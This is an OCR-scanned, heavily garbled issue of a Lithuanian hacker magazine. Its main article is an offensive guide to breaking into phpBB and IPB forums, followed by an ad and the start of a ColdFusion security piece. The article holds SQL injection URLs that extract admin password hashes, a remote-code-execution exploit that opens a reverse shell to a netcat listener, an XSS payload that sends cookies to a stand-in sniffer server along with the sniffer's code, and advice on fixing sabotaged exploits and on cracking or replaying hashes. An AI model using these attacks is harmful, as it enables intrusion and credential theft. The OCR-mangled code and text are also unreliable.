PER WEB SKRIPTŲ PAŽEIDŽIAMUMUS. IŠ- 
ORIŠKAI TOKS ĮSILAUŽIMAS GALI ATRODY- 
TI GANA PAPRASTA UŽDUOTIMI: SURADAI 
SKYLĖTĄ SKRIPTĄ, PO TO JAM TINKANTĮ 
EKSPLOITĄ — IR VISKAS, LAIMINGO SKRY- 
DŽIO. TAČIAU VOS TIK PRIEINAMA IKI PRAK- 
TIKOS, SUSIDURI SU TIESIOG NEĮTIKĖTINO- 
MIS PROBLEMOMIS.. 


SOFTWARE 


IMPLANT 


HACK 


Visi pagrindiniai populiarių forumų 
eksploitai ir pažeidžiamumai 

[Kame šaknys?] Jeigu tu bent kartą bandei įsilaužimui 
panaudoti eksploitus, turėtum suprasti, apie ką kal- 
bu. Sutik, surasti pažeidžiamą servisą ar web skriptą 
šiandien nėra problema. Klaidų (taip pat ir kritinių) yra 
praktiškai visur, 0 skaitlingi pranešimai bugtrag foru- 
muose — papildomas šio teiginio patvirtinimas. Kur kas 
sudėtingiau parinkti tinkamą ir, kas taip pat labai svar- 
bu, veiksmingą eksploitą. Paprastai problemos prasi- 
deda jo panaudojimo metu. Tai eksploitas nulūžta ir 
išmeta klaidos pranešimą, tai atsisako kompiliuotis, 
tai nieko nesakydamas bando suformatuoti tavo kie- 
tąjį diską :). Dar daugiau, daugelis programuotojų eks- 
ploitų kode specialiai palieka klaidas, norėdami Išvengti 
to, kad jį naudos tie, kuriems, tiesą sakant, jis nerei- 
kalingas. 

Klaidų yra tiek daug, jog kartais žiūri į forumą ir žinai, 
kad jis pažeidžiamas. Bet nulaužti jo niekaip neišei- 
na. Ne bėda! Šiandien mes tau paruošėme išsamų 
gidą su karščiausiais populiariausių forumų (phpBB 
ir IPB) pažeidžiamumais. Kaip sakoma, sudėliosim 
visus taškus ant i. 


SCENA 


UNIXOID 


[phpBB <= 2.0.12 — priėjimas 

prie administratoriaus skydelio] 

Bet kurioje senesnėje nei 2.0.13 phpBB forumo versi- 
joje lengva gauti priėjimą prie administratoriaus Įran- 
kių. Tokia rimta saugumo skylė čia yra dėl vartotojo au- 
torizacijos metu atliekamo nekorektiško identifikacinių 
duomenų sulyginimo. Programuotojai ineludes/ses- 
sions.php skripto 82 eilutėje padarė loginę klaidą: 


CODING 


išsessondato(autologinid] == Šaute login key) 


UNITS 


Iš pirmo žvilgsnio, viskas normalu. Čia sulyginami iden- 


tifikatoriai, ir jeigu jie lygūs, vartotojas įleidžiamas į sistemą. 
Tačiau yra ne visai taip. Esmė tame, kad operatorius „==“ grą- 
žina true, jeigu jo operandai „lygūs“ vienas kitam, ir sąvoka „ly- 
gūs“ čia suprantama gana savotiškai. Pavyzdžiui, „+1.a“ ope- 
ratoriaus nuomone yra tas pats, kas ir „0001“. Sulyginus tipus 
tiek viena, tiek kita eilutė taps vienetu, o tai reiškia, kad jos bus 
viena kitai lygios. Dėl šios priežasties PHP kalboje yra „identiš- 
kos lygybės“ operatorius (trys lygybės ženklai, „ kuris be 
viso kito sąlygoja ir operandų tipo sutapimą. Šioje skripto vieto- 
je gamintojams derėjo panaudoti būtent šį operatorių, tačiau 
jie apie tai nepagalvojo, neapsižiūrėjo ir dėl to savo produkte 
gavo rimtą skylę. 

Norint kad vartotoją įleistų į sisterną, tereikia kad identifikato- 
riaus ilgis jo sausainuke sutaptų su $auto login key ilgiu. Pa- 
rinkti reikiamą autologinid reikšmę ir įrašyti ją į sausainuką nėra 
sudėtinga, su kuo puikiai susidoroja /NJeo [SJecurity [Tleam ko- 
mandos eksploitas. Eksploitas parašytas su gryna C ir puikiai 
kompiliuojasi bet kokioje platformoje, kadangi nenaudoja jokių 
specifinių bibliotekų. Nepaisant to, yra vienas niuansas: jis gali 
veikti tik su Mozilla arba Firefox naršyklėmis. Šios naršyklės sau- 
sainukų reikšmes saugo cookies.txt byloje (eksploito vykdomą 


bylą reikia kišsaugoti kataloge su šia byla), o eksploitas specia- 
liai sudarytą sausainuką įrašo būtent į šią bylą. 

Parsisiųsti eksploitą galima iš čia: www.securitylab.ru/ 
53017.html. Prieš ji naudodamas nepamiršk autorizuotis foru- 
me, tuo pačiu atjungdamas slaptažodžio išsaugojimą. 


[phpBB <= 2.0.12 — laisvai pasirinkto kodo įvykdymas| 

Sutik, jog priėjimas prie administratoriaus skydelio — tai toli 
gražu ne svajonių riba, ypač tuo atveju, jeigu pats forumas ta- 
vęs visiškai nedomina. Lygiai taip pat pagalvojo ir hakeris over- 
dose, kuris panaudojo sessions.php skripte surastą klaidą ir 
parašė eksploitą, įvykdantį serveryje laisvai pasirinktą kodą. Tam 
jam teko panaudoti vienos iš administracinių bylų admin sty- 
Ies.php ypatumą, leidžiantį prie forumo prijungti šabloną su įdieg- 
ta funkcija eval($str) ($str — eilutė, kuri transliavimo metu bus 
interpretuota kaip PHP kodas). Taip pavyko realizuoti tokį algo- 
titma: panaudodamas autorizacijos klaidą, eksploitas patenka 
Į forumą su administratoriaus teisėmis, su eval() funkcija pri- 
Jungia pagalbinį šabloną ir su specialiais parametrais jai per- 
duoda koda, kuris vykdo sistemines komandas. Eksploitas pa- 
rašytas su C (www.securitylab.ru/ Exploits/2005/03/phpbb 


exp.cpp.txt), tačiau siekiant 


Kiinka deniatų Večių išvengti kompiliavimo proble- 
imanoma, kad hakeraisų— Mų, rekomenduoju iš karto 
sialai padarė kokia nes parsisiųsti jau paruoštą vyk- 
Ala tai skundai ap 


domą bylą (www.t-nas.org 
exploity/windows 

phpbbexp.exe). Dabar kele. 
tas žodžių apie jos panaudo- 
jimą. Programai perduodami 
3 parametrai: pilnas forumo 


saugą nuo skrotvakių, Iš 
stuojuok šio oksplolto 6 


adresas, kompiuterio su 
„1 / Rekeių nepanisi joe! įjungtu netcat'u IP adresas ir 
Iaraija Įsanmams o is Jungtis, kurios klausosi nc. 
straipsnis pateikiamas Uk Kad geriau visa tai supras- 
P 4 tum, pateikiu eksploito pa- 
Strapsnioautoius r nedas 
211 tsako Už Medė naudojimo pavyzdį: 


suklojimą net 


ikslais. 


DAkackorNphpbhosp oro https/si 
te.com/phpbb2/ 62.11.11.11 31337 


Geriausia apsaugo nio Ai 


y esės non du cookie. (ecipere! 
Še Vasas maunimas, — Bhabblnysą| 
Paskutinos phpBB nysion SESSION ID tecupor? 


Power Board versijas gali 


Odiddis62bhd2434342434561] 113212 
http://site.com/phpob2 


ma parsisiųst! 


Navviphbi.com Ir y 


vorai. conI ?sij O6fdis62bd26343424345611 
18212 
recuperaion do non dė lo table są! senpeni Ok 


— Injedion de la fake templates „OK 

“Fir ae 

DAhackeNnc.exe -Iwp 31337 

listening on [any] 31337 

conned to [6211.11.11] from site.com [216.237.117.1 
id 

ui 99 (nobody) gid 99 (nobody) grovos= 99 (1obedy) 


12] 57532 


Daugybė svetainių neturi savo administratoriaus, todėl forumai 
ilgam paliekami be deramo dėmesio. Tikimybė surasti pažei- 
džiamą forumo versiją kur kas didesnė, nei tu įsivaizduoji. 


web shello gavimui skirtas eksploito kodas 
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Nc.exe — tai tinklo įrankis netcat 
(www.securitylab.ru/tools/ 
33265.html), kuris sukuria tinklo pri- 
sijungimą per 31337 jungtį ir „klau- 
sosi“ įeinančių prisijungimų. Faktiš- 
kai tu gauni web shellą, bet jeigu 
nori pasirausti administratoriaus sky- 
delyje, pakanka pašalinti visus savo 
kukius ir užeiti ta nuoroda, kurią tau 
pateikė eksploitas. Mano atveju ji yra 
http://site.com/phpbb2/ 
?sid=06fddfs62bbd263434243456f11f3212. 


Puikus pažeidžiamų 
skriptų paieškos įren 

kis yra wvww.go0g: 
Ieicom, Išsamiau opie 
tal, kaip šiam Ukslui 
įdarbinti paiešką, tu 
ali perskaityti mūsų 
žumale spausdinamė 
straipsnyje „Google 

hack mažiams“ 
28, 2005 nugsė 

Jis) 


[phpBB <= 2.0.13 download mod — laisvai pasirinkto ko- 
do vykdymas] Tokie populiarūs forumai kaip phpBB ilgainiui ap- 
auga daugybe nepriklausomų papildymų (taip vadinami mod'ai ir 
hack'ai), kurie forumui suteikia papildomų funkcijų ir galimybių. Vis 
dėlto kartu su naujomis galimybėmis pasirodo ir naujos klaidos. Ne 
taip senai pažeidžiamumas buvo surastas populiariame mode dow- 
nloads, kuris leidžia forumo vartotojams sistemiškai dalinti bylas. 
Šis pažeidžiamumas yra kritiškas: gamintojai kažkodėl pagalvojo, 
kad užklausos parametrų filtruoti nereikia, todėl net ir nepatyręs 
hakeris galėjo savarankiškai įvykdyti SOL injekciją. Skriptui per- 
duodama užklausa suformuojama pagal visus klasikinius šios sri- 
ties kanonus: www.victim.com/phpBB/downloads.php?cat=- 
1320UNI0ON4620SELECT4200,.user pas- 
sword,0,0,0,0,0,0,09520FROM*620phpb b users“620WHE- 
RE?*620user id=1/*. Taip išgaunamas bet kurio forumo vartotojo, 
taip pat ir administratoriaus, slaptažodžio hešas — tam vietoje 
user id reikia nurodyti dvejetą. Iškilus būtinybei, naudotis šiuo šab- 
Jonu nėra patogu, todėl aš tau rekomenduoju pasinaudoti eksplo!- 
tu (www.securitylab.ru/ Exploits/2005/04/downlo- 
ads phpBB 2 O 13.pl.txt), tinkančiu bet kuriai mažesnei už 
2.0.13 (įskaitant) forumo versijai su įdiegtu download modu. Eks- 
ploitui perduodami trys parametrai: tinklo mazgo vardas arba IP 
adresas, kelias iki serveryje esančio forumo ir administratoriaus 
identifikatorius (daugeliu atveju jis lygus 2). Jei sėkmė nusišypsos, 
eksploitas grąžins admino md5 hešą, kurį galima įrašyti į savo 
sausainuką. 


pažeidžiamas sessiors,php skripto kodas 


[phpBB <= 2.0.15 — atsisakymas aptarnauti] Web skrip- 
tams skirti DoS eksploitai — didelė retenybė. Vis dėlto jie eg- 
zistuoja. Neseniai išleistas [NST] saugumo grupės eksploitas 
esant tam tikroms sąlygoms gali užlaužti bet kurią mažesnę už 
2.0.16 phpBB versiją. Eksploito veikimo pagrindas — siauros 
paskirties fIoodo technikos panaudojimas. Eksploitas foruma 
tiesiog užverčia dideliu suklastotų užklausų kiekiu, kurioms ap- 
doroti reikia daug laiko. Panaudojant nepakankamai gerai ap- 
galvotą profile.php filtravimo sistemą, atliekami bandymai už- 
registruoti didelį vartotojų kiekį. Nesėkmės atvejui sugalvotas ir 
kitas variantas — eksploitas pradeda laužti serverį su daugybe 
paieškos užklausų (byla search.php). Tokios užklausos sudaro- 
mos ypatingai, kad serveriui jų apdorojimui reikėtų sunaudoti 
kuo daugiau laiko. 

Egzistuoja dvi šio eksploito versijos: viena iš jų parašyta su gry- 
na C, kita — su Perl. Man teko testuoti jas abi, tačiau turiu 
pripažinti, kad jos veikia toli gražu ne visada. Mano naminio 
ADSL su siauru 256 kbi/'s kanalu tam akivaizdžiai neužteko, 
todėl aš turėjau pasinaudoti specialiai paruoštu shellu. Po de- 
šimties bandymų keli forumai iš tiesų užlūžo: vietoje pilnaver- 
tiško darbo buvo pateikiamos kažkokios MySOL klaidos. Abi eks- 
ploito versijos yra čia: http://neosecurityteam.net/index.php?pa- 
Zina =advisoriesšid=15. 


[phpBB 2.0.15 — laisvai pasirinktų komandų vykdymas] Ši 
forumo versija — dar vienas tikras hakerio atradimas. Dėl gru- 
bios teksto išryškinimo (highlight) realizacijos klaidos įmanoma 
į vykdomą skriptą įterpti laisvai pasirinktą PHP kodą. Bet kuris 
pageidaujantysis gali įvesti PHP funkciją system(), o paramet- 
ruose nurodyti reikiamą sisteminių komandų rinkinį, tai yra gauti 
savotišką shellą. 

Visa ši betvarkė įmanoma dėl neteisingo skripte viewtopic.php 
iškviečiamos funkcijos preg replace() panaudojimo. Paaiškin- 
siu remdamasis pavyzdžiu. 


<? 

Sstring ="systen("uname -0")"; 
Sstring2= preg replace(//e',Šsting!,“); 
1> 


| 
| 
|| 


UM 


MI KSKSKK KISS AIK KKSSKK SKK EISIKSESIŲ 


| 


Us Te 
downloads.php skripto Kaida eidžia per 2 minutes nugvelbti visą informaciją apie vartotojus 


Funkcijos preg replace raktas „e“ parodo tai, kad $string1 eilu- 
tę reikia interpretuoti kaip PHP kodą, t. y. šis pavyzdys serveryje 
įvykdo komandą uname -a. Teisingai sudarius išryškinimo funk- 
cijai perduodamą užklausą, galima įterpti bet kokį kodą ir nuto- 
lusiame serveryje įvykdyti bet kokią komandą. Su python para- 
šytą eksploitą galima parsisiųsti iš čia: www.securitylab.ru/ Ex- 
ploits/2005/07/phpbb2015.py. 

Pastebėtina tai, jog šis pažeidžiamumas tapo loginiu kritinės 
klaidos, kuri buvo ištaisyta dar phpBB 2.0.11, tęsiniu. Net ir 
įvertinus visą hakerių phpBB forumui rodomą meilę, jo kūrė- 
jai kažkodėl labai atmestinai užtaiso daugelį savo produkto 
klaidų, Įskaitant ir kritines. 


[phpBB <=2.0.16 — cross site scripting] Pradžiai prisi- 
minkime, kas gi yra Cross Site Scripting. XSS užpuolimas reiš- 
kia, kad hakeriui pavyko į pažeidžiamą skriptą įterpti savo 
HTML kodą. Daugeliu atvejų šis kodas yra nedidelis JavaSc- 
ript skriptas, skirtas konfidencialios vartotojų informacijos (jų 
cookies, sesijų identifikatoriai ir t.t.) vagystei. Kartais XSS 
leidžia apeiti autentifikacijos mechanizmą, o kai kuriais at- 
vejais netgi serveryje įvykdyti laisvai pasirinktą komandą. 
Neslepsiu: phpBB forume panašių klaidų daugybė. Universa- 
liausias pažeidžiamumas, kuris būdingas visoms phpBB 
<=2.0.16 versijoms, buvo surastas [URL] tago apdorojimo ko- 
de. Nepakankamai apgalvoti regexp'ai leidžia sukurti įmontuo- 
tus BB URL tagus ir įterpti JavaScript kodą. Visas eksploitas 
(antichat.ru/txt/phpbb/) atrodo štai taip: 


[color= FONO SPALVA) [url]www.ul [url — www.s= "style = "Tont-size:0;color:FO 
NO SPALVA'style ="top:expression (eval(this.sss));'s55 =" =ne4/""/Ima- 
ge|);i.src="htip://tavo.setveris.lt/cgi-bin/sniff. php?“ + document. cookie;this.ss5 = nul- 
Ustyle = "fonisize:0:][/url][/utl] [/color] 


Eksploitas, kurį parašė Zadoxlik iš www.antichat.ru, forumo var- 
totojų sausainukus išsiunčia specialiam skriptui-sniferiui, esan- 
čiam adresu http://tavo.serveris.lt/cgi-bin/sniff.php. Šis skrip- 
tas gali būti įkurdintas bet kuriame nemokamame hostingo ser- 
veryje, kuriame leidžiama naudoti PHP: 

<?php 

Šaokie = $ GET[C]; 

Sip = gelenv (REMOTE ADDR|; 

Sdate= date('| F, I, g:i a"); 

Srelerer — gotenv (HTTP REFERER'); 

Sfp — fopen('cookies.tt“, '0'); 

fvrie(Šip, Cookie: Scaokie/ <br > IP: * Šip. 

"<br Date and Time: * Sdate. '<bi> Referer 

"Šreferor./ <hr > <br> <hr>"); 


Idos); 
2> 


Tu tikriausiai pastebėjai, kad eksploito kode yra keistas para- 
metras — FONO SPALVA. Eksploito autorius taip padarė neat- 
sitiktinai. Eksploitas suveiks tik pas tuos vartotojus, kurie nau- 
doja Internet Explorer. Opera ir Firefox tokį kodą interpretuoja 
nekorektiškai ir pateikia klaidos pranešimą. Nenorėdamas išsi- 
duoti eksploitas juos maskuoja, klaidų pranešimus išvesdamas 
fono spalva, t.y. taip padaro juos nematomais. Šią spalvą gali- 
ma gauti iš einamo šablono, kuris standartinės temos atveju 
yra EFEFEF 


[Invision Power Board] IPB panašiai kaip ir phpBB yra ypa- 
tingai populiarus forumų kūrimo skriptas, tačiau jame suras- 
tų pažeidžiamumų yra kur kas mažiau. Pasakysiu dar dau- 
giau: rimtų skylių, per kurias realiai būtų įmanoma kaip nors 
pakenkti serveriui, praktiškai nėra, o bugtrag forumuose nė- 
ra nė vieno pranešimo apie galimybę nutolusioje mašinoje 
įvykdyti laisvai pasirinktą kodą. Po ilgo klaidų 
ir eksploitų studijavimo dėmesį norisi atkreipti 
tik į vieną eksploitą — universalų SOL injek- 
cijos įvykdymo variantą, skirtą tiek 1.x, tiek ir 
2.x (iki 2.0.4) IPB šakai. 


[IPB 1.x, 2.x (<2.0.4) — priėjimas prie ad- 
ministratoriaus skydelio] Bet kuri iš pami- 
nėtų IPB versijų pažeidžiama SOL Injekcijai. 
Tai įmanoma dėl nepakankamai rimto skrip- 
te sources/login.php atliekamo cookies bylų 
apdorojimo. Klaida slypi funkcijoje my get 
cookie($name), kuri nekorektiškai panaudo- 
ja funkciją urldecodel). Jeigu serveryje ijung- 
ta magic guotes, užklausoje perduotas sim- 
bolis 962527 pavirsta viengubomis kabutėmis. 
Dėl to hakeriui pavyksta įvykdyti bet kokią SOL 
užklausą ir išgauti vartotojų hešus. 

Šiam pažeidžiamumui skirtą eksploitą išlei- 
do iš karto kelios security komandos, taip pat 
ir RST. Tu jį gali parsisiųsti iš http://rst.void.ru/ 
download/r57ipb2.txt, tačiau skubu tave nu- 
liūdinti: iš karto jis pas tave nesuveiks. Šį eks- 
ploitą sukūręs 1dt.wO/f jame specialiai pali- 


Eksplojas DoS atakai prieš phpbb kompiliuojas! 
ir pasileidžia labai lengvai, tik pasiekti akivazdų efektą ne taip jau paprasta 


ko loginę klaidą, taip apsisaugodamas nuo 
kvailių. Su Perl draugaujančiam žmogui ją su- 
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rasti tikrai nebus sunku, tačiau kad nereikėtų kankintis, aš 
Išduosiu klaidos vietą. Norint eksploitą padaryti veikiantį, te- 
reikia eilutę „$allchar .= chr(42);“ pakeisti į „$allchar .= 


chr(Si);“, 
Šiam Per! skriptui reikia perduoti 4 parametrus: serverio adre- 
są, kelią iki forumo, member id (administratoriui — 1), IPB 


versiją (0 — IPB 1.x, 1 — IPB 2.x). Konkrečiame pavyzdyje tai 
atrodo taip: r57ipb2.pl www.victim.com /IPB/ 1 1. Esminė 
sėkmės sąlyga: serverio PHP konfige turi būti įjungtos ma- 
gic guotes. 


[Pabaiga] Daugelis smerkia gatavų eksploitų naudojimą, bet 
tai tikrai nėra blogai. Nors hakeris iš tokių įsilaužimų negaus 
patirties, tačiau jis galės lengvai pelnyti pilnavertį *nix shellą. O 
tai jau yra geras tolimesnių įsilaužimų placdarmas, kuriame gal- 
būt teks įdiegti nuosavą logų nerašantį proxy serverį arba, pa- 
vyzdžiui, skenuoti ištisus IP adresų potinklius, ieškant mašinų 


i „i 


k delete line 


“I (escape) menu | 


h pEOnpt p prev lig prev 
m nex lio V next 
b back 1 char 

*£ foruard 1 char 


Žindelete char “= next word 


|uaz/LocaL/Bin/pyckon 
priut "VaphpaB 2.0.15 atbitrary command execution elploit" 
print " 2005 by ratt ieiavarenetvork- org 

print " well, just because there 18 none," 


import sya 
£rom urilib2 import Reguėst, urlopen“N 
žrom uriparse import uriparse, urlunpare“X 
£rom urllib import guote as guot= plus“N 


E 
INITTAG = "<g05!*H 
ENDTAS * '</g0>**8 
r 
der makecnd (ona) :*H 
che (54) 


Leturn reduce |laubda X,yi X 


sord (y) „Sma[2:] "eh (sd) ora (cnd[0] 


def usage) :*E 
princ "Usage: 45 
" 

žorum - žully gualified url to the 
examples Ketpi 
*n 


torus> <topie>“H 


ses. homt cm phpi 


ek yourself.*H 


+ sys-argv[0]> sys exit (M 


ya. argv[2] „isdigit():*H 


+ uEi[O) 
I urif2j = 
uc1[4] = uE1[5] 


+ urlunparse (ur1jH 


phpbb forumui skirto eksploito python kodas 


su tam tikru pažeidžiamumu. phpBB tam suteikia puikią gali- 
mybę — manau, kad paguldyti ji ant menčių ne tokia jau sudė- 
tinga užduotis. 


gs 
IPB eksplojias 


[Ką daryti su administratoriaus slaptažodžio hešu?] 
Daugelis iš šiame straipsnyje pateiktų eksploitų leidžia gauti 
administratoriaus slaptažodžio hešą. Tačiau hešas — tai ne 
pats slaptažodis, o lyg ir jo antspaudas, tam tikras parašas. 
Dėl to hešo negalima pateikti vietoje slaptažodžio. Yra du jo 
panaudojimo variantai. 

Pirmasis variantas yra akivaizdžiausias — dešifruoti hešą ir 
gauti tikrąjį slaptažodį. Daugelis forumų hešams generuoti 
naudoja md5 algoritmą, kurį dešifruoti galima išskirtinai tik 
brutforsinant (bukai viską iš eilės, pagal žodyną arba su rain- 
bow tables — tai nesvarbu). Iš specialiai tam skirtų įrankių 
aš išskirčiau programą PasswordsPro (www.insidepro.com). 
Prie jos privalumų galima priskirti gerą funkcionalumą (per- 
rinkimas pagal slaptažodį, pagal kaukę, bukas perrinkimas 
pagal automatiškai sudarytas kombinacijas), didelį perrinki- 
mo greitį, galimybę dešifruoti iš karto kelis hešų tipus (MySOL, 
MD4 ir MD5, SHA-1 ir SHA-1). Perrinkimui skirtas žodynas 
gali žymiai padidinti sėkmės šansus — jų galima rasti, pa- 
vyzdžiui, www.nsd.ru svetainėje. MD5 hešų dešifravimui taip 
pat skirti ir on-line servisai. Pažangiausiu iš jų pelnytai lai- 
komas www.passcracking.com, kuris panaudoja paskirstytų 
skaičiavimų sistemą ir milžinišką hešų lentelių bazę (47,6 
Gb). Bet kokiu atveju hešui dešifruoti gali prireikti nemažai 
laiko, todėl aš rekomenduoju panaudoti kitą variantą. 

Po to, kai tu autorizuojiesi forume (paprasto vartotojo teisė- 
mis), tavo mašinoje automatiškai sukuriamas sausainukas 
(cookie), kuriame saugomas tavo slaptažodžio hešas. To rei- 
kia tam, kad forumas tave „įsimintų“ ir tau nereikėtų iš nau- 
jo įvedinėti slaptažodžio. Tokia situacija mums labai naudin- 
ga, kadangi savo slaptažodžio hešą pakeitus į administrato- 
riaus slaptažodžio hešą, tu be jokių nesusipratimų galėsi 
prisijungti jo vardu. Paredaguoti sausainukus galima su Co- 
okie Editor (www.proxoft.com) įrankiu arba, pavyzdžiui, su į 
Opera naršyklę įmontuotu sausainukų redaktoriumi, 


Intenso. All yOur dat4 nOw b3lOng5 t0O u5! 
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nugi Mai 700 MB N-58X | 


CO-Recordable CC 


CD-Recordable - CD-Enregistrable 


Intenso, optinių laikmenų pardavimų lyderis Vokietijoje, siūlo platų muzika | duomenys | nuotraukos | video 
aukštos kokybės CD-R, CD-RW, DVD-R(W), DVD+R(W) ir padidintos 

talpos diskų 800Mb/90 min. pasirinkimą. Visi šie produktai 

platinami „cakebox“ ir „jewel“ dėžutėse. 


Spartiems DVD, mini-DVD (8 cm) ir dvisluoksniams DVD diskams 
Intenso siūlo dar platesnį pakuočių pasirinkimą. 

Unikalus naujas produktas - CD ir DVD su specialiu spalvas 
apsaugančiu užpurškimu. 


Intenso - tai aukštos kokybės produkcija už gerą kainą. 


(Intenso) 


www.intenso.de 
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„ColdFusion“ vabaliukai 


MŪSŲ UŽ VANDENYNO GYVENANTYS 
DRAUGAI NEPALAIKO MŪSŲ NUOMONĖS 
APIE NEMOKAMAS PROGRAMAS IR PIR- 
MENYBĘ TEIKIA MOKAMIEMS SPRENDI- 
MAMS — JIEMS TAI TAM TIKRA PRASME 
YRA KOKYBIŠKO PALAIKYMO GARANTIJA. 
SUNKU PASAKYTI, AR DĖL TO KALTAS JŲ 
MENTALITETAS, BET BESIRINKDAMOS 
SERVERINIŲ WEB PROGRAMŲ KŪRIMO 
PLATFORMĄ, VIS DAUGIAU KOMPANIJŲ 
PIRMENYBĘ TEIKIA COLDFUSION, O NE 
PERL AR PHP MES SU TAVIMI ŠIĄ SITUA- 
CIJĄ SUVOKSIME KAIP FAKTĄ IR PRADĖSI- 
ME STUDIJUOTI SAUGUMO KLAUSIMĄ: 
JUK KUO DAŽNIAU PASITAIKO CFM SKRIP- 
TAI, TUO SVARBIAU MUMS SUPRASTI, KO- 
KIE TRŪKUMAI GALI BŪTI APTIKTI PANA- 
ŠIOSE SISTEMOSE. 


Pagrindinės programuotojų 

klaidos „cfm“ skriptuose 
[Išsiaiškinkime pagrindus] Visų pirma reikia išsi- 
aiškinti, kas gi yra ColdFusion. Tai programų serve- 
ris (application server), kuriam web serveris (daž- 
niausiai IIS, bet pasitaiko sąsajų ir su Apache) per- 
duoda apdoroti specialias c/m bylas — tai vyksta 
visiškai taip pat, kaip PHP interpretatorius apdoroja 
PHP bylas. Cfm tipo bylos yra CFML (ColdFusion Mar- 
kup Language) kalbos kodas. Tai ColdFusion serve- 
rio kalba, kuri yra tam tikras XML poaibis: visi ope- 
ratoriai ir išraiškos atvaizduojami specialių tagų rin- 
kiniu. Dėl šios priežasties cfm skriptai kartais atro- 
do kaip kokios nors template sistemos dizaino šab- 
lonai :). Vis dėlto toks išorinis panašumas apgaulin- 
gas: ColdFusion suteikia daugybę galimybių ir savo 
funkcionalumu vargu ar nusileidžia bet kuriai kitai 
skriptinei kalbai. 

Serverio konfigūravimui naudojamas ColdFusion Ad- 
ministrator — specialus web įrankis, patogių dialogų 
pagalba leidžiantis sukonfigūruoti sistemą. Išsamiau 
apie tai pakalbėsime kiek vėliau, o dabar aptarkime 
kalbą, kad tau neiškiltų elementarių klausimų. Visų 
pirma reikia išsiaiškinti, jog visi CFML tagai praside- 
da priešdėliu (prefix) cf, po kurio eina pati komanda. 
Pavyzdžiui, dvi bet kurioje kalboje dažniausiai naudo- 
jamos komandos — priskyrimas ir sąlyga — čia atro- 
do taip: 


HACK IMPLANT SOFTWARE 


SCENA 


CODING UNIXOID 


UNITS 


Nr 


<dii var neg 5> <!-— įeigu var nelygus penkiems — 
< dsot var = 5> <!-- priskirti kintamojam var reikšmę 5 
</di> 


Kaip matosi pavyzdyje, sulyginimo operatoriai primena Lisp 
kalbą: čia EO (arba IS) naudojamas lygybės salygai, NEO 
skirtas nelygybei, GT ir LT atitinkamai daugiau arba ma- 
žiau. Taip pat matosi, jog komentarai įterpiami praktiškai 
(LTS > — 


= — 


Dėl programuotojų neraštingumo galima atlikti sa! 
injekcija, be 10, mes gavome daugybę papildomos informacijos 


taip pat, kaip ir HTML, tik iš 
abiejų pusių naudojami trys 
brūkšneliai, o ne du. 
Daugelis tagų turi atitinkamus už 
darančius elementus, kaip kad 
parodyta aukščiau pateiktame 
pavyzdyje su <cfif>. Tokie ta- 
Pat“ gai gali turėti ir atributus: tarkim, 
kai, TO tipo cikle bus 3-4 atributai: 
kreipt ciklo kintamojo pavadinimas, du 
Tėu atributai su ciklo ribomis ir ne- 
privalomas žingsnio atributas: 


Aloop index — *i' hom =" 10“ slap = "2 
HTML arba CFML k 


Be to, CFScript yra CFML dalis tai labai į JavaScript panaši 
kalba; norint ją panaudoti, pakanka reikiamas instrukcijas įra- 
šyti tarp <cfscript> </cfscript> tagų poros. Štai pirmasis su 
CFScript parašytas pavyzdys: 


Nepaisant to, kad visi knygu ir straipsnių apie CFML autoriai re- 
»menduoja naudoti CFScript, kuri taginės CFML atžvilgiu yra grei- 
tesnė, greičio išbandymai lauko sąlygomis verčia daryti išvadą, 
Jog arba tai tie patys kiaušiniai, tik įprastesnė sintaksė, arba 
CFScript greitesnė tik su kažkokioms siauros srities užduotimis. 
ColdFusion serveris pagrinde veikia Windows sistemoje (jis taip 
pat sėkmingai gali veikti Solaris, Linux, Cobalt bei HP-UX siste 
mose), jis moka dirbti su sisteminiu registru, Windows domeni- 
nės autentifikacijos duomenimis, ini bylomis ir kitais dalykėliais 
Kalbama, jog programuoti su ColdFusion nejtikėtinai paprasta, 
kadangį ji savyje apima daugybę įvairiausios paskirties funkcijų. 
Labiausiai džiugina tai, kad joje yra funkcijos patogiam darbui 


[Su aptariama tema susijusios nuorodos] 
www.macromedia.com/software/coldfusion — gamintojo pa 
teikiamos naujovės, dokumentacija ir kiti naudingi dalykėliai 
www.macromedia.com/cfusion/exchange paruoštų pro- 
gramų, funkcijų ir custom tag'ų rinkinys. 
Wwww.easycfm.com kumentacija; ja galima naudotis, 
kai po ranka nėra ColdFusion Studio. 
www.brainbench.com šiaip jau tai yra testavimo centras; 
čia praėjus testą galima gauti ColdFusion meistro vardą ir 
faktą paviešinti savo CV (kartkartėmis BB daugelį 


www.fusebox 
cfml.forever. 


i apie FuseBox. 
įdomių straipsnių oldFusion rinkinys 
(rusų kalba). 
http://bigd.kappa.ro; 
eities tekstas. 
Wwww.s o0ls/5ZPOBOOFPG.html ColdFu: 
sion Web Shell (tiesa, ten panaudotas <cfexecutė veikia 
tik serveriuose su Windows NT 4.0 ir UNIX sistemomis). 


-pdoru/cfm/cfdecrypt.c — CFDecrypt iš- 


su masyvais, struktūromis (vardiniais masyvais) ir sąrašais. Taip 
pat įspūdį daro patogi kontekstinė dokumentacija ir keletas kitų 
privalumų, pavyzdžiui, automatinis atributų arba uždarančių ta 
gu įterpimas, kas įmontuota į tokius redaktorius, kaip HomeSi 
te ir ColdFusion Studio. 

Toliau derėtų paminėti vieną darbo su CFML ypatybę. Greta kitų 
kalbų, ji pripažista daugkartinį kodo panaudojimą, kuris apifor- 
mintas vartotojiškos funkcijos pavidalu, tačiau be to joje numaty- 
tas nuosavų tagų (custom tags) apibrėžimo mechanizmas: jeigu 
reikšmės funkcijoje perduodamos poziciškai (tarkim, bylos atica 
rymo funkcijoje pirmas parametras visada yra eilutės tipo bylos 
pavadinimas, o antras — darbo režimas), tai nuosavo tago Iš- 
kvietimas apiforminamas įvardinant parametrus-atributus — ta 
labai primena tipišką htm/ tagą su keliais pločio ir spalvos tipo 
atributais, tik už tokio tago elgseną atsako pats programuotojas. 
Iš esmės custom tag — tai pagrįstas taginės kalbos priedas. 


Ar tau PHP kalboje teko susidurti su kuo nors panašaus į $$var? 
Ši išraiška vadinama „kintamasis kintamasis“ (variable variab- 


Ie), t.y. kito iš eilės kodo rezultatas bus 666: 


Svar= "Too"; 
Sloo= 666; 
ar 


Jeigu PHP tuo naudojasi mažai kas, tai ColdFusion atveju tokia 
savybė sutinkama pakankamai dažnai. Tam kintamojo pavadiini 
mą reikia įrašyti tarp „4“ simbolių. Pavyzdžiui, tu turi dešimt x, x2, 
x10 tipo kintamųjų. Per visus juos pereiti galima būtų taip: 


loop index from — “1 10 = "10 
set PIP" = "Var" 8 
dl 
